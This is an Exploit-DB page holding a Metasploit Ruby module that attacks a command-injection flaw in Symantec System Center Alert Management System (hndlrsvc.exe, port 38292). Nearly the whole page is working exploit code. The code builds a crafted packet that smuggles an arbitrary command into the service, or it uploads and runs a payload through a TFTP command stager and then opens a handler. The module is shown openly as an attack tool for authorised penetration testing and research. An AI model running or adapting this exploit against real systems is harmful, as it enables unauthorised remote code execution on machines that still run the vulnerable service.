Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)

EDB-ID:

17700

CVE:


EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2011-08-19

Vulnerable App: 
##
# $Id: ams_hndlrsvc.rb 13591 2011-08-19 18:35:29Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	Rank = ExcellentRanking

	include Msf::Exploit::CmdStagerTFTP
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
			'Description'    => %q{
					Symantec System Center Alert Management System is prone to a 
				remote command-injection vulnerability because the application fails 
				to properly sanitize user-supplied input.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13591 $',
			'References'     =>
				[
					[ 'OSVDB', '66807'],
					[ 'BID', '41959' ],
					[ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
				],
			'Targets'       =>
				[
					[ 'Windows Universal',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						}
					]
				],
			'Privileged' => 'true',
			'Platform' => 'win',
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jul 26 2010'))

		register_options(
			[
				Opt::RPORT(38292),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]), 
			], self.class)
	end

	def windows_stager

		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
		execute_cmdstager({ :temp => '.'})
		@payload_exe = payload_exe

		print_status("Attempting to execute the payload...")
		execute_command(@payload_exe)

	end

	def execute_command(cmd, opts = {})
	
		connect

		if ( cmd.length > 128 )
			raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
		end

		string_uno  = Rex::Text.rand_text_alpha_upper(11)
		string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)

		packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
		packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
		packet << "\xe8\x03\x00\x00"
		packet << 'PRGXCNFG'
		packet << "\x10\x00\x00\x00"
		packet << "\x00\x00\x00\x00\x04"
		packet << 'ALHD\F'
		packet << "\x00\x00\x01\x00\x00"
		packet << "\x00\x01\x00\x0e\x00"
		packet << 'Risk Repaired'
		packet << "\x00\x25\x00"
		packet << 'Symantec Antivirus Corporate Edition'
		packet << "\x00\xf9\x1d\x13\x4a\x3f"
		packet << [string_uno.length + 1].pack('v') + string_uno
		packet << "\x00\x08\x08\x0a"
		packet << "\x00" + 'Risk Name'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x08\x0a\x00"
		packet << 'File Path'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x08\x11\x00"
		packet << 'Requested Action'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x08\x0e\x00"
		packet << 'Actual Action'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x08\x07\x00"
		packet << 'Logger'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x08\x05\x00"
		packet << 'User'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x08\x09\x00"
		packet << 'Hostname'
		packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
		packet << "\x00\x08\x13\x00"
		packet << 'Corrective Actions'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00\x00\x07\x08\x12\x00"
		packet << 'ConfigurationName'
		packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
		packet << "\x00" + cmd
		packet << "\x00\x08\x0c\x00"
		packet << 'CommandLine'
		packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
		packet << "\x00" + cmd
		packet << "\x00\x08\x08\x00"
		packet << 'RunArgs'
		packet << "\x00\x04\x00\x02\x00"
		packet << "\x20\x00\x03\x05\x00"
		packet << 'Mode'
		packet << "\x00\x04\x00\x02\x00\x00\x00"
		packet << "\x0a\x0d\x00"
		packet << 'FormatString'
		packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
		packet << 'ConfigurationName'
		packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
		packet << 'HandlerHost'
		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
		packet << "\x00" + string_dos
		packet << "\x00" * packet.length

		sock.put(packet)
	
		select(nil,nil,nil,3)	
		disconnect
	end

	def exploit

		if not datastore['CMD'].empty?
			print_status("Executing command '#{datastore['CMD']}'")
			execute_command(datastore['CMD'])
			return
		end

		case target['Platform']
			when 'win'
				windows_stager
			else
				raise RuntimeError, 'Target not supported.'
			end

		handler

	end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services